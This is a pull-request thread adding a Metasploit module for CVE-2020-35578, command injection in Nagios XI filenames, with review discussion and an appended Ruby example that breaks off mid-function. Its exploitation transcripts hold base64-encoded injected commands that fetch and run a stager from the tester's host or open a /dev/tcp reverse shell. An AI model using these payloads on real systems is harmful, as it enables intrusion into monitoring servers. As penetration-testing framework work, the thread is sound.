
Add Nagios XI Plugins Filename Authenticate RCE module and docs (CVE-2020-35578) #14700

Merged
merged 5 commits into from
Apr 14, 2021

Conversation

ErikWynter

About

This change adds a module to modules/exploit/linux/http/ that exploits an OS command injection vulnerability (CVE-2020-35578) in Nagios XI version 5.7.X (and possibly older versions) to achieve remote code execution as the apache user. The check method takes advantage of the Nagios XI mixin introduced in PR #14697. This PR also adds documentation.

Vulnerable Application

Nagios XI version 5.7.X (and possibly older versions)

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
  3. Do: set RHOSTS [IP]
  4. Do: set USERNAME [username for the Nagios XI account]
  5. Do: set PASSWORD [password for the Nagios XI account]
  6. Do: set target [target]
  7. Do: set payload [payload]
  8. Do: set LHOST [IP]
  9. Do: exploit

Options

PASSWORD

The password for the Nagios XI account to authenticate with.

TARGETURI

The base path to Nagios XI. The default value is /nagiosxi/.

USERNAME

The username for the Nagios XI account to authenticate with. The default value is nagiosadmin.

Targets

Id  Name
--  ----
0   Linux
1   CMD

Scenarios

Nagios XI 5.7.3 running on CentOS 7 - Linux target

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nagiosadmin      yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4011             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4011 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/eaGWp8C5GQVvqG
[*] Local IP: http://192.168.1.12:8080/eaGWp8C5GQVvqG
[*] Client 192.168.1.14 (Wget/1.14 (linux-gnu)) requested /eaGWp8C5GQVvqG
[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
[*] Sending stage (976712 bytes) to 192.168.1.14
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Meterpreter session 1 opened (192.168.1.12:4011 -> 192.168.1.14:48622) at 2021-02-01 12:33:13 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#
getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)

Nagios XI 5.7.3 running on CentOS 7 - CMD target

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4012 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Command shell session 2 opened (192.168.1.12:4012 -> 192.168.1.14:40864) at 2021-02-01 12:35:09 -0500
[+] Deleted /usr/local/nagios/libexec/;echo MDwmNTYtO2V4ZWMgNTY8Pi9kZXYvdGNwLzE5Mi4xNjguOTEuMTI4LzQwMTI7c2ggPCY1NiA+JjU2IDI+JjU2 | base64 -d | bash;#

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)

@bcoles

bcoles commented Feb 6, 2021

This change adds a module to modules/exploit/linux/http/ that exploits an OS command injection vulnerability (CVE-2020-35578) in Nagios XI version 5.7.X (and possibly older versions)

This is exploitable since 5.4.4 and possibly earlier. It is not exploitable in 5.2.3. Unfortunately I don't have any 5.3.x systems to test.

NagiosXI 5.7.5 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=6pcraj61np3cm0vv20n76v8m06;", "nagiosxi=142916gc815c2f6s7dcipurv34;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.5
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/yZbGJUFabdnV
[*] Local IP: http://10.1.1.117:8080/yZbGJUFabdnV
[*] Client 10.1.1.115 (Wget/1.14 (linux-gnu)) requested /yZbGJUFabdnV
[*] Sending payload to 10.1.1.115 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.115
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 15 opened (10.1.1.117:4444 -> 10.1.1.115:47204) at 2021-02-06 02:31:06 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oa1dOdG90TyBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3laYkdKVUZhYmRuVjtjaG1vZCAreCAvdG1wL2hrV050b3RPOy90bXAvaGtXTnRvdE87cm0gLWYgL3RtcC9oa1dOdG90Tw== | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oa1dOdG90TyBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3laYkdKVUZhYmRuVjtjaG1vZCAreCAvdG1wL2hrV050b3RPOy90bXAvaGtXTnRvdE87cm0gLWYgL3RtcC9oa1dOdG90Tw== | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

NagiosXI 5.6.0 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=hrjgvok7mebml9dp3bjs5vsse4;", "nagiosxi=02e1tpgvfs54afj3sr2i42teo5;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.7
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/8dvLNpsCRUH7i
[*] Local IP: http://10.1.1.117:8080/8dvLNpsCRUH7i
[*] Client 10.1.1.114 (Wget/1.14 (linux-gnu)) requested /8dvLNpsCRUH7i
[*] Sending payload to 10.1.1.114 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.114
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Meterpreter session 9 opened (10.1.1.117:4444 -> 10.1.1.114:33022) at 2021-02-06 02:00:55 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9jVWtuS25sWCBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzhkdkxOcHNDUlVIN2k7Y2htb2QgK3ggL3RtcC9jVWtuS25sWDsvdG1wL2NVa25LbmxYO3JtIC1mIC90bXAvY1VrbktubFg= | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9jVWtuS25sWCBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzhkdkxOcHNDUlVIN2k7Y2htb2QgK3ggL3RtcC9jVWtuS25sWDsvdG1wL2NVa25LbmxYO3JtIC1mIC90bXAvY1VrbktubFg= | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.7.1908 (Linux 3.10.0-1062.1.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

NagiosXI 5.5.0 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=bfi0lcddc20luls8km2288ofn5;", "nagiosxi=h3bhqdiknqqshcu40kadc90v25;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.0
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/BYasjRKBjTq1EZ
[*] Local IP: http://10.1.1.117:8080/BYasjRKBjTq1EZ
[*] Client 10.1.1.118 (Wget/1.14 (linux-gnu)) requested /BYasjRKBjTq1EZ
[*] Sending payload to 10.1.1.118 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.118
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Meterpreter session 6 opened (10.1.1.117:4444 -> 10.1.1.118:37978) at 2021-02-06 01:33:20 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9YSFRVU2RRYSBodHRwOi8vMTAuMS4xLjExNzo4MDgwL0JZYXNqUktCalRxMUVaO2NobW9kICt4IC90bXAvWEhUVVNkUWE7L3RtcC9YSFRVU2RRYTtybSAtZiAvdG1wL1hIVFVTZFFh | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9YSFRVU2RRYSBodHRwOi8vMTAuMS4xLjExNzo4MDgwL0JZYXNqUktCalRxMUVaO2NobW9kICt4IC90bXAvWEhUVVNkUWE7L3RtcC9YSFRVU2RRYTtybSAtZiAvdG1wL1hIVFVTZFFh | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.5.1804 (Linux 3.10.0-862.3.3.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

NagiosXI 5.4.10 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=d8a52ec3f16p8orucsackd0654;", "nagiosxi=2ullbdg14e5jgdq4up5a82c5f7;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.4.10
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/wPmv4I4BlM9z
[*] Local IP: http://10.1.1.117:8080/wPmv4I4BlM9z
[*] Client 10.1.1.112 (Wget/1.12 (linux-gnu)) requested /wPmv4I4BlM9z
[*] Sending payload to 10.1.1.112 (Wget/1.12 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.112
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 5 opened (10.1.1.117:4444 -> 10.1.1.112:42600) at 2021-02-06 01:32:26 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9rZGtrWXlxSCBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3dQbXY0STRCbE05ejtjaG1vZCAreCAvdG1wL2tka2tZeXFIOy90bXAva2Rra1l5cUg7cm0gLWYgL3RtcC9rZGtrWXlxSA== | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9rZGtrWXlxSCBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3dQbXY0STRCbE05ejtjaG1vZCAreCAvdG1wL2tka2tZeXFIOy90bXAva2Rra1l5cUg7cm0gLWYgL3RtcC9rZGtrWXlxSA== | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.10.2.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

NagiosXI 5.4.4 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=2dncsg6qlsmeo3faaofkf4t683;", "nagiosxi=deleted;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.4.4
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/9sVlIgnTgQc7k
[*] Local IP: http://10.1.1.117:8080/9sVlIgnTgQc7k
[*] Client 10.1.1.110 (Wget/1.12 (linux-gnu)) requested /9sVlIgnTgQc7k
[*] Sending payload to 10.1.1.110 (Wget/1.12 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.110
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Meterpreter session 7 opened (10.1.1.117:4444 -> 10.1.1.110:45116) at 2021-02-06 01:36:27 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9iUE55ZG1kdiBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzlzVmxJZ25UZ1FjN2s7Y2htb2QgK3ggL3RtcC9iUE55ZG1kdjsvdG1wL2JQTnlkbWR2O3JtIC1mIC90bXAvYlBOeWRtZHY= | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9iUE55ZG1kdiBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzlzVmxJZ25UZ1FjN2s7Y2htb2QgK3ggL3RtcC9iUE55ZG1kdjsvdG1wL2JQTnlkbWR2O3JtIC1mIC90bXAvYlBOeWRtZHY= | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.1.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

NagiosXI 5.2.3 (fail)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=aib85nrofigutif5uknm6vrvm1;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.2.3
[+] The target appears to be vulnerable.
[-] Exploit aborted due to failure: unexpected-reply: Unexpected response received while trying to visit `/nagiosxi/admin/monitoringplugins.php`
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > 

@bcoles bcoles added the blocked Blocked by one or more additional tasks label Feb 22, 2021
@ErikWynter

Nagios XI 5.3.0 is also vulnerable, so I will assume the vulnerable range (inclusive) is 5.3.0 - 5.7.9

Nagios XI 5.3.0 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.91.128:3423 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.3.0
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/Da644qIgCMel
[*] Local IP: http://192.168.91.128:8080/Da644qIgCMel
[*] Client 192.168.91.166 (Wget/1.14 (linux-gnu)) requested /Da644qIgCMel
[*] Sending payload to 192.168.91.166 (Wget/1.14 (linux-gnu))
[*] Sending stage (976712 bytes) to 192.168.91.166
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Meterpreter session 3 opened (192.168.91.128:3423 -> 192.168.91.166:60000) at 2021-03-01 08:59:35 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9aWEVsSUNkRSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9EYTY0NHFJZ0NNZWw7Y2htb2QgK3ggL3RtcC9aWEVsSUNkRTsvdG1wL1pYRWxJQ2RFO3JtIC1mIC90bXAvWlhFbElDZEU= | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9aWEVsSUNkRSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9EYTY0NHFJZ0NNZWw7Y2htb2QgK3ggL3RtcC9aWEVsSUNkRTsvdG1wL1pYRWxJQ2RFO3JtIC1mIC90bXAvWlhFbElDZEU= | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)

@gwillcox-r7 gwillcox-r7 self-assigned this Mar 13, 2021
@ErikWynter

The latest commit uses the updated mixin and updates the version and docs.

Nagios XI 5.3.0 running on CentOS 7 - Linux target

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosxi         yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.3.0
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/1V9MerMauwnh8
[*] Local IP: http://192.168.1.12:8080/1V9MerMauwnh8
[*] Client 192.168.1.16 (Wget/1.14 (linux-gnu)) requested /1V9MerMauwnh8
[*] Sending payload to 192.168.1.16 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 192.168.1.16
[*] Command Stager progress - 100.00% done (120/120 bytes)
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9hSVN5dVRtZiBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC8xVjlNZXJNYXV3bmg4O2NobW9kICt4IC90bXAvYUlTeXVUbWY7L3RtcC9hSVN5dVRtZjtybSAtZiAvdG1wL2FJU3l1VG1m | base64 -d | bash;#
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:54012) at 2021-04-01 12:12:35 -0400
[*] Server stopped.

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)

Nagios XI 5.7.5 running on CentOS 7 - CMD target

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.5
[+] The target appears to be vulnerable.
[*] Executing the payload
[+] Deleted /usr/local/nagios/libexec/;echo MDwmMTcwLTtleGVjIDE3MDw+L2Rldi90Y3AvMTkyLjE2OC45MS4xMjgvNDQ0NDtzaCA8JjE3MCA+JjE3MCAyPiYxNzA= | base64 -d | bash;#
[*] Command shell session 1 opened (192.168.1.12:4444 -> 192.168.1.14:42834) at 2021-04-01 11:57:38 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) context=system_u:system_r:httpd_t:s0

@bcoles bcoles removed the blocked Blocked by one or more additional tasks label Apr 1, 2021
Comment on lines +124 to +128
when 1..3
return CheckCode::Unknown(res_array[0])
when 5 # the Nagios XI license agreement still has not been signed
return CheckCode::Detected('Failed to sign the license agreement.')
end

See my discussion on your other PR at #14701 (comment) re: not handling cases where the result is 0 or 4 here, and how this can lead to issues down the line.

Note this also affects your @auth_cookies line below but I have minimized this to one comment for brevity's sake.

See https://github.com/rapid7/metasploit-framework/pull/14701/files#r612653906 for more info. Basically this problem is still valid but after further discussion it was determined to be unlikely to be encountered. We will still leave this issue open for future travelers though.

print_good('Successfully authenticated to Nagios XI')

# Obtain the Nagios XI version
@auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already

Again see discussion above, this value can actually be nil in the case where login_result is 4.

@gwillcox-r7 gwillcox-r7 Apr 14, 2021

Copied from https://github.com/rapid7/metasploit-framework/pull/14701/files#r612660759:

Right, so technically speaking, the only cases that we can hit here are 0 and 4; the other cases will be caught by the checks above. As mentioned at https://github.com/rapid7/metasploit-framework/pull/14701/files?file-filters%5B%5D=.rb#r612656355, whilst it is possible that case 4 could be encountered, at this point it is very unlikely given the checks that will have occurred previously, and if such a case does happen it would mean that something is seriously wrong with the NagiosXI install.

When login_result is 0 though, the result will be [0, [res_index.body, auth_cookies]] in which case this makes sense.

I will leave this comment here as a warning, though: if the mixin does expand and, let's say, option 6 is added where the second element is not an array containing at least two elements, then this line will end up failing, so caution is advised.

@gwillcox-r7

Alright, I resolved all issues minus the two that we agreed would remain open, as there is little chance of them being hit, but we wanted to make people aware of the issue in case people encounter it in the future.

Rest will be fixed in a commit I will push up in a second, after which I will then start testing.

@gwillcox-r7

Alright, so it looks like I did find a small error, which we may also have to fix in the previous PR I landed. In particular, in the check function we do the following bit of code:

nagios_version = nagios_xi_version(res_array[0])
if nagios_version.nil?
  return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
end

print_status("Target is Nagios XI with version #{nagios_version}")
# check if the target is actually vulnerable
@version = Rex::Version.new(nagios_version)

The problem with this is that, depending on the release, nagios_version could also be a value like 2014R2.7, which results in an error when it gets passed to Rex::Version.new(), which doesn't know how to handle this, resulting in cases like the following:

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 172.25.33.151:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 2014R2.7
[-] Exploit failed: ArgumentError Malformed version number string 2014R2.7
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > 

@gwillcox-r7

Exploit works brilliantly on a Nagios XI 5.5.6 target; will upload updated documentation shortly. Seems it's just the issue mentioned above that I'll need to address.

@gwillcox-r7

gwillcox-r7 commented Apr 14, 2021

Alright, I came up with this regex, which should help prevent the issue above:

print_status("Target is Nagios XI with version #{nagios_version}")
# check if the target is actually vulnerable
if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d\.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
  nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
end

Note that because the print_status call comes first, we will still print out the correct target version.

Oh and with this update we now get the right output:

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.25.33.151:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 2014R2.7
[+] The target appears to be vulnerable.
[-] Exploit aborted due to failure: no-target: Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > 

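A worked example added here (not code from the module, the Nagios XI mixin, or this PR) that covers both points raised in the review thread: the login-result dispatch whose `when 1..3` / `when 5` branches leave codes 0 and 4 unhandled, and the legacy version strings such as 2014R2.7 that Rex::Version rejects. It assumes Rex::Version behaves like Gem::Version, which it subclasses, so Gem::Version reproduces the "Malformed version number string" failure offline. The meanings of result codes other than 0 and 5, the check outcome names, the assumed dispatch for code 4, and all sample inputs are assumptions made for the example; the regexes and the 5.3.0 / 5.8.0 boundaries come from the thread.

```ruby
# Added example: models the check method's two decision points discussed in
# this PR. Not the module's or the mixin's own code; result-code meanings
# other than 0 and 5 are assumptions, as are the outcome symbol names.
require 'rubygems' # Gem::Version is the parent class of Rex::Version

# Legacy Nagios XI version formats from the thread, e.g. "2014R2.7".
LEGACY_VERSION_PATTERNS = [
  /^\d{4}R\d\.\d/,
  /^\d{4}RC\d/,
  /^\d{4}R\d\.\d[A-Ha-h]/
].freeze
LEGACY_PLACEHOLDER = '1.0.0' # stands in for "older than anything the module supports"

MIN_SUPPORTED = Gem::Version.new('5.3.0') # oldest version the module exploits
FIXED_VERSION = Gem::Version.new('5.8.0') # release notes: vulnerable prior to 5.8.0

def legacy_version?(version_string)
  version_string == '5R1.0' ||
    LEGACY_VERSION_PATTERNS.any? { |re| re.match(version_string) }
end

# True when Gem::Version (and therefore Rex::Version) raises on the string,
# which is the ArgumentError seen in the 2014R2.7 transcript above.
def raw_version_parse_fails?(version_string)
  Gem::Version.new(version_string)
  false
rescue ArgumentError
  true
end

# Collapse legacy formats to the placeholder, as the PR's workaround does,
# so the string always reaches the version comparison in a parseable form.
def normalize_nagios_version(version_string)
  legacy_version?(version_string) ? LEGACY_PLACEHOLDER : version_string
end

# Exhaustive dispatch over the mixin's (login_result, res_array) pair.
# Code 0 carries [dashboard_body, auth_cookies]; code 5 means the license is
# unsigned; 1..3 map to Unknown as in the snippet under review. Code 4
# (whose second element may be nil) and any future code hit the else branch,
# so a malformed payload never reaches the destructuring step.
# Returns [check_code, detail, cookies].
def classify_login(login_result, res_array)
  case login_result
  when 0
    body, cookies = res_array.is_a?(Array) ? res_array : [nil, nil]
    if body.nil? || cookies.nil?
      return [:unknown, 'Login succeeded but no dashboard or cookies were returned', nil]
    end
    [:ok, body, cookies]
  when 1..3
    [:unknown, res_array.is_a?(Array) ? res_array[0].to_s : res_array.to_s, nil]
  when 5
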